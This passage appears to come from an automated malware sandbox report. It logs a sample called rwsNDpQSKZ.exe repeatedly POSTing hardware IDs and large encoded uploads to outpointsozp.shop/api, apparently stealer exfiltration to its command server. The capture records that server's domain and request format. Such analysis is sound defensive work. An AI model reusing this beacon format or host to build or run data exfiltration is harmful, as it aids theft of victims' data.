              Data Ascii: FQMfd0EpK0sITKtGjd9H39MiHfcNVxzgzJfqpbgmSPRLTB55SiooRAlBrkjfmALWy2ZOuChED+2ejqC0+yxJuhAIVjoCJzQDXAaaTMOKCN/aaAWoYFlM6oDI/Pz8L1a/EgcdekUvKUkESaxCw5oG28NvSLkkSQXqgIyj/LZhQ6xTVFZfYw0ARB4Gtw/U0QDUizoFuydMBuaLgqq19ipWphAIFX1BJyVNBEGtT8qQDNzBYUP3YAAL9czQ5JD7IUm
              2024-07-27 09:25:07 UTC1369INData Raw: 48 56 46 4b 43 46 52 42 30 6d 6e 52 63 32 65 41 64 37 4b 62 55 4f 77 4a 30 45 45 36 73 7a 47 35 4c 76 67 59 52 7a 30 50 51 73 56 63 41 49 2f 59 6c 70 45 51 61 51 42 6c 64 45 48 30 73 46 6f 53 37 63 70 55 67 72 6b 6a 49 75 32 76 2f 34 70 51 72 67 66 41 52 35 39 51 69 55 6e 54 67 39 4c 72 6b 48 47 6b 45 65 57 69 32 56 64 39 33 59 41 50 65 43 43 6a 4b 71 2f 36 43 59 45 71 31 30 56 56 6e 4e 4f 59 48 51 44 43 30 2b 36 52 73 69 5a 44 74 6a 46 61 30 79 77 4b 6b 4d 4e 36 59 43 48 72 62 2f 77 49 45 79 37 45 41 77 64 66 45 67 68 49 6b 5a 45 43 4f 68 47 31 64 46 66 6d 4f 52 68 51 4c 77 76 41 69 76 72 69 34 54 6b 6f 37 59 34 42 4c 4d 66 54 45 34 30 51 53 51 69 53 67 74 43 6f 6b 62 4e 6c 67 48 59 77 32 6c 49 76 44 78 46 41 75 69 4e 69 4b 57 7a 39 43 46 57 73 52 30 48
              Data Ascii: HVFKCFRB0mnRc2eAd7KbUOwJ0EE6szG5LvgYRz0PQsVcAI/YlpEQaQBldEH0sFoS7cpUgrkjIu2v/4pQrgfAR59QiUnTg9LrkHGkEeWi2Vd93YAPeCCjKq/6CYEq10VVnNOYHQDC0+6RsiZDtjFa0ywKkMN6YCHrb/wIEy7EAwdfEghIkZECOhG1dFfmORhQLwvAivri4Tko7Y4BLMfTE40QSQiSgtCokbNlgHYw2lIvDxFAuiNiKWz9CFWsR0H
              2024-07-27 09:25:07 UTC203INData Raw: 34 43 52 41 4a 44 72 31 47 50 76 77 7a 4d 7a 43 49 4c 39 79 45 41 56 4e 54 4d 77 4f 53 44 74 6d 46 63 39 45 74 4d 49 33 64 4d 4c 69 74 56 46 51 75 47 52 73 75 55 41 4d 69 4a 54 45 36 6a 4b 51 42 43 72 59 72 49 2f 4f 79 32 59 55 43 6c 55 31 52 47 4a 68 6c 31 66 78 52 55 46 4c 63 50 31 4e 45 52 6d 4a 4d 77 43 2f 63 38 41 46 53 74 79 34 75 32 72 76 34 69 55 72 64 55 4d 69 68 33 56 43 30 6a 53 41 56 34 6c 6d 2f 41 6b 41 54 57 69 56 4e 54 75 6a 35 44 43 65 71 79 74 71 71 37 37 43 5a 4b 73 68 4e 4d 57 44 52 4e 59 48 52 36 52 41 37 6f 66 6f 50 52 48 35 69 54 49 6e 43 30 49 45 34 4c 2b 35 33 46 68 36 72 0d 0a
              Data Ascii: 4CRAJDr1GPvwzMzCIL9yEAVNTMwOSDtmFc9EtMI3dMLitVFQuGRsuUAMiJTE6jKQBCrYrI/Oy2YUClU1RGJhl1fxRUFLcP1NERmJMwC/c8AFSty4u2rv4iUrdUMih3VC0jSAV4lm/AkATWiVNTuj5DCeqytqq77CZKshNMWDRNYHR6RA7ofoPRH5iTInC0IE4L+53Fh6r
              2024-07-27 09:25:07 UTC1369INData Raw: 32 34 36 39 0d 0a 31 4c 6b 2b 31 55 30 4a 57 63 67 4a 34 66 41 31 45 51 72 6b 42 6c 63 46 56 67 35 34 78 45 75 64 38 58 30 4c 30 7a 4a 37 6b 35 4b 70 76 42 4b 5a 54 56 46 59 7a 54 43 30 74 51 41 70 46 75 6c 50 4c 6b 68 48 62 6a 46 78 37 6c 69 4e 4c 41 4f 43 44 67 35 71 43 32 53 78 50 75 42 34 44 48 55 70 38 4e 53 39 4e 43 6b 47 2b 55 49 33 66 52 39 65 4c 4f 6e 7a 33 5a 67 41 7a 6f 38 79 51 35 4f 53 34 46 45 65 36 48 51 73 41 5a 51 38 42 49 55 67 49 53 36 64 4b 6a 64 39 48 33 6f 73 36 46 66 6c 75 52 42 32 74 31 4e 6a 32 35 36 31 79 45 2b 52 42 45 31 68 74 41 6a 5a 73 47 31 59 49 36 46 4f 4e 79 55 65 66 79 48 42 58 73 53 31 57 44 36 71 79 74 6f 65 72 37 69 74 66 39 6a 55 4c 42 33 31 55 4c 54 35 39 4f 6d 69 6c 51 4d 36 66 52 65 6e 64 62 31 57 30 4b 30 63 79
              Data Ascii: 24691Lk+1U0JWcgJ4fA1EQrkBlcFVg54xEud8X0L0zJ7k5KpvBKZTVFYzTC0tQApFulPLkhHbjFx7liNLAOCDg5qC2SxPuB4DHUp8NS9NCkG+UI3fR9eLOnz3ZgAzo8yQ5OS4FEe6HQsAZQ8BIUgIS6dKjd9H3os6FfluRB2t1Nj2561yE+RBE1htAjZsG1YI6FONyUefyHBXsS1WD6qytoer7itf9jULB31ULT59OmilQM6fRendb1W0K0cy
              2024-07-27 09:25:07 UTC1369INData Raw: 54 75 35 32 39 64 39 41 56 4d 54 69 59 4d 59 44 34 44 58 41 62 76 51 74 2b 44 41 64 76 64 59 51 4b 4a 45 47 59 50 2f 49 61 70 71 61 7a 2f 48 33 71 68 45 41 49 59 63 31 51 78 62 41 31 45 53 65 67 5a 39 4e 46 50 6c 4d 31 68 55 2f 63 52 44 6b 7a 31 7a 4e 44 6b 69 66 73 76 53 72 4d 46 48 56 74 53 51 54 45 6d 59 67 6c 57 72 77 47 44 30 51 47 59 6b 7a 45 4c 39 79 70 52 54 4c 58 63 32 76 2f 70 71 33 59 55 35 67 78 43 44 7a 52 55 59 48 51 52 53 67 61 36 41 5a 58 52 51 4e 76 5a 63 45 4f 30 4f 45 4e 4c 30 37 4b 39 70 37 4c 32 4a 6c 4b 42 45 42 30 56 64 45 6b 65 45 6d 49 4b 54 61 39 4e 32 36 38 35 37 63 68 73 53 37 41 34 55 55 79 6a 7a 49 66 6b 35 4d 46 68 44 50 51 73 51 6c 5a 73 41 6e 68 73 64 67 64 49 70 6b 62 62 67 45 72 74 79 48 4e 47 74 79 55 41 51 71 32 4b 79
              Data Ascii: Tu529d9AVMTiYMYD4DXAbvQt+DAdvdYQKJEGYP/Iapqaz/H3qhEAIYc1QxbA1ESegZ9NFPlM1hU/cRDkz1zNDkifsvSrMFHVtSQTEmYglWrwGD0QGYkzEL9ypRTLXc2v/pq3YU5gxCDzRUYHQRSga6AZXRQNvZcEO0OENL07K9p7L2JlKBEB0VdEkeEmIKTa9N26857chsS7A4UUyjzIfk5MFhDPQsQlZsAnhsdgdIpkbbgErtyHNGtyUAQq2Ky


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.449733188.114.97.34436820C:\Users\user\Desktop\rwsNDpQSKZ.exe
              TimestampBytes transferredDirectionData
              2024-07-27 09:25:08 UTC283OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 18170
              Host: outpointsozp.shop
              2024-07-27 09:25:08 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 41 36 36 38 30 45 31 34 38 32 41 39 33 43 35 45 32 38 42 42 32 35 32 30 37 36 31 30 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 64 66 62 4d 45 2d 2d 72 65 76 65 72
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"72EA6680E1482A93C5E28BB25207610D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"edfbME--rever
              2024-07-27 09:25:08 UTC2839OUTData Raw: 79 41 bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27
              Data Ascii: yA~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'
              2024-07-27 09:25:09 UTC804INHTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:08 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=nstvbnd79ourvs8ij3rau3gp1h; expires=Wed, 20-Nov-2024 03:11:47 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XJPFeF3fqLDn%2FvpCJ4YyKz28ZLlropE8T77%2BdCkDZuonovirl156vQvQehqWUnX9clwsFWiTqQ094pK6IqY46M5iWMDV6mhpRlSB%2BJdkgJjD51JDz84yjfBBL2nmecWvcCUqog%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b9498aa12c330-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-27 09:25:09 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-27 09:25:09 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.449734188.114.97.34436820C:\Users\user\Desktop\rwsNDpQSKZ.exe
              TimestampBytes transferredDirectionData
              2024-07-27 09:25:10 UTC282OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 8791
              Host: outpointsozp.shop
              2024-07-27 09:25:10 UTC8791OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 41 36 36 38 30 45 31 34 38 32 41 39 33 43 35 45 32 38 42 42 32 35 32 30 37 36 31 30 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 64 66 62 4d 45 2d 2d 72 65 76 65 72
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"72EA6680E1482A93C5E28BB25207610D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"edfbME--rever
              2024-07-27 09:25:11 UTC804INHTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:10 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=8c6t1i5c24t2odtho2ba89n4mu; expires=Wed, 20-Nov-2024 03:11:49 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ez1ereIwbiVpIHsLiO7S%2B7M433iSFXTFTyXXVZlQSDmtXvVAq6V1mM5FGVlbBgYhLAicvLyQRlNy74MvLwU9dAupK3cPg9TYd2JSp5C6u05Kqg1cmsVlqrI6v%2F9nnefaPoF%2B7A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b94a33d467d16-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-27 09:25:11 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-27 09:25:11 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.449735188.114.97.34436820C:\Users\user\Desktop\rwsNDpQSKZ.exe
              TimestampBytes transferredDirectionData
              2024-07-27 09:25:11 UTC283OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 20444
              Host: outpointsozp.shop
              2024-07-27 09:25:11 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 41 36 36 38 30 45 31 34 38 32 41 39 33 43 35 45 32 38 42 42 32 35 32 30 37 36 31 30 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 64 66 62 4d 45 2d 2d 72 65 76 65 72
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"72EA6680E1482A93C5E28BB25207610D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"edfbME--rever
              2024-07-27 09:25:11 UTC5113OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06
              Data Ascii: `M?lrQMn 64F6(X&7~
              2024-07-27 09:25:12 UTC802INHTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:12 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=jrc4j32tj4h88jl6e61q5atjml; expires=Wed, 20-Nov-2024 03:11:51 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lZlEJeKQLqMipv23yjKcYOqv5axaG9klQ0M2Qe6uyCuwvsvYCqyhuwcZs46KZFJ0UFh%2FAeQwgoiwXRCW0KLgHrqR%2Btkds8Jvq59p1fnCX4jQTn9Ha9NOatn9BER7Pw3encfhlA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b94accc964394-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-27 09:25:12 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-27 09:25:12 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.449736188.114.97.34436820C:\Users\user\Desktop\rwsNDpQSKZ.exe
              TimestampBytes transferredDirectionData
              2024-07-27 09:25:13 UTC282OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 1283
              Host: outpointsozp.shop
              2024-07-27 09:25:13 UTC1283OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 41 36 36 38 30 45 31 34 38 32 41 39 33 43 35 45 32 38 42 42 32 35 32 30 37 36 31 30 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 64 66 62 4d 45 2d 2d 72 65 76 65 72
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"72EA6680E1482A93C5E28BB25207610D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"edfbME--rever
              2024-07-27 09:25:13 UTC808INHTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:13 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=d0mjiu0u256kjhpi827h53jgcf; expires=Wed, 20-Nov-2024 03:11:52 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qJHGj51SeXFyHRXoa671hML9MT4RKdl%2FI1YDNNa4DFWszCAQlbc3H7lFO%2BQwo9p7h1mOB3oqEECrwNo540RP%2BsK5DbRjPcFzoojO4VSSpsivIox5R9i8izy96XdRb7P%2Bo%2B0RZA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b94b52fa742df-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-27 09:25:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-27 09:25:13 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.449737188.114.97.34436820C:\Users\user\Desktop\rwsNDpQSKZ.exe
              TimestampBytes transferredDirectionData
              2024-07-27 09:25:14 UTC284OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 573113
              Host: outpointsozp.shop
              2024-07-27 09:25:14 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 41 36 36 38 30 45 31 34 38 32 41 39 33 43 35 45 32 38 42 42 32 35 32 30 37 36 31 30 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 64 66 62 4d 45 2d 2d 72 65 76 65 72
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"72EA6680E1482A93C5E28BB25207610D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"edfbME--rever
              2024-07-27 09:25:14 UTC15331OUTData Raw: d9 bf f1 10 71 d4 88 b6 5b 0b 56 45 1f 81 58 ca 4a e0 2f 61 4e e9 01 9c 71 17 60 2d 9f 02 1e 4c 17 98 a1 c3 62 cb ba 66 d4 56 eb 42 ac 87 ee 61 3a 80 95 1d 32 87 70 34 23 55 68 f2 ff b7 93 d2 0b 0b 12 57 65 e1 01 00 ef 23 34 ad 28 01 85 3e a0 05 b5 a8 cc 68 db 10 d9 04 1e 92 12 2a 33 5d 16 bf 35 fa 11 7a f8 85 bb 84 e4 f6 00 7b 1c fa 31 44 9d 5e 2c f4 6c 05 ac 12 34 49 d3 03 f8 5e 28 12 d2 83 a3 b0 44 8f 91 6a 5d 5c ae 4f 75 aa 76 c1 c9 1f f8 fe 08 39 74 5b 3c 85 35 df 37 7e ef 34 2f ed 23 29 ac 41 3c a7 db 03 fd 42 de 66 b4 4c 0a 4c b5 50 2a bb 1e d0 1e dc 61 6e 66 17 f2 39 3e b9 a3 e1 3d d3 11 a4 67 55 a3 ec 50 55 8f 7e a5 66 14 01 23 53 84 88 2e 53 8b b0 00 a5 cc 36 4c ee 65 b2 35 44 76 0a 01 e1 fc e1 c6 a4 5f e2 2e de f8 b3 a0 89 43 a7 2f 5d 2a e4 97
              Data Ascii: q[VEXJ/aNq`-LbfVBa:2p4#UhWe#4(>h*3]5z{1D^,l4I^(Dj]\Ouv9t[<57~4/#)A<BfLLP*anf9>=gUPU~f#S.S6Le5Dv_.C/]*
              2024-07-27 09:25:14 UTC15331OUTData Raw: ac be 4e 9b b4 54 17 75 54 15 78 9b 58 65 f5 c5 32 2b 84 be 09 cd 8a 4f ac b8 fb 41 93 7f 76 05 6a 00 01 b6 49 bd db 27 7c 3a 43 9d c3 42 82 53 19 91 17 07 93 16 5c 2c e0 e0 13 5a 04 df 84 79 6b 95 ca 84 6d cc 50 92 59 96 45 9c 01 9a 88 e2 3c 2e fa f6 b7 c2 6a 8d a4 87 0a d3 78 5c a9 fe e6 24 aa be b4 6c 53 7f 2e 29 8f e2 2d b8 53 bd 28 a1 ca 70 2b 91 4d 6f 35 27 7a e3 f2 4a b1 d2 5d f7 c3 3a 4a b3 97 f8 f4 8c 53 39 48 64 85 c3 48 72 4f de e5 ef 94 6f 6f 51 44 e0 9c ff dc 8f 1f 61 53 48 1e 9f 39 fb e1 cf 69 02 93 72 9d 8b 49 28 62 cb b3 ea de f5 66 59 e4 3d 75 5c 27 5a 84 7e 5f 6b 3c 25 86 aa 3d e2 d0 d6 ac 52 1f ba 8b 3d 92 ee ba 4a 1a 6d 40 8d 5d 00 d6 f1 54 c2 0c 61 59 e6 d7 7b e2 49 57 a7 19 a5 61 e5 27 76 d4 1c 38 69 28 9e 75 cf 97 a6 81 aa 31 89 09
              Data Ascii: NTuTxXe2+OAvjI'|:CBS\,ZykmPYE<.jx\$lS.)-S(p+Mo5'zJ]:JS9HdHrOooQDaSH9irI(bfY=u\'Z~_k<%=R=Jm@]TaY{IWa'v8i(u1
              2024-07-27 09:25:14 UTC15331OUTData Raw: 25 e0 f8 fb c8 fe 71 f0 96 69 e6 1c 93 10 15 87 20 a7 ae b9 bd a2 ce eb 97 ac 61 3e 28 58 ba 56 aa 83 56 c9 d0 0d 43 79 b9 33 46 dd a5 2d 6e a5 de da 28 7a e1 d3 bc 00 e7 51 9c 27 74 25 30 f9 fe f6 91 c5 e2 ae ce 25 17 84 8d 7d 74 10 3f b9 e5 8f 60 25 a4 0c a6 8a ed f8 c3 3d 3a 80 4c eb de 6a 44 e8 a4 86 29 ee 55 4d d9 56 72 97 c5 b8 dc d0 ee ad 12 8f 8b 3f 2e 0c 29 7f dd 07 12 aa 0f 38 b3 df fb 74 3a 3e e7 df 14 38 29 f6 27 63 cb fa 4d f1 6c 78 db 3f cd ef 47 42 2c 96 60 4d 32 c5 21 4f 71 54 71 85 fa 4a 76 f8 4f 0f 65 2a 74 95 19 c3 5b db 4a 7a 3a 22 7e 9a d0 d0 5e 5b 5d 64 c3 2e 3e 9a 76 38 c6 ed e0 1e 4b 39 ab e1 a3 3b 41 7f 2e 3b 1e db be c2 4f d4 40 e3 0c ef cc bf b9 91 b7 11 b4 55 2e ae 3f 8b 29 5e 0f 4b ea 28 6a bb 2e 2a d6 dc 96 56 58 9c bb b9 9e
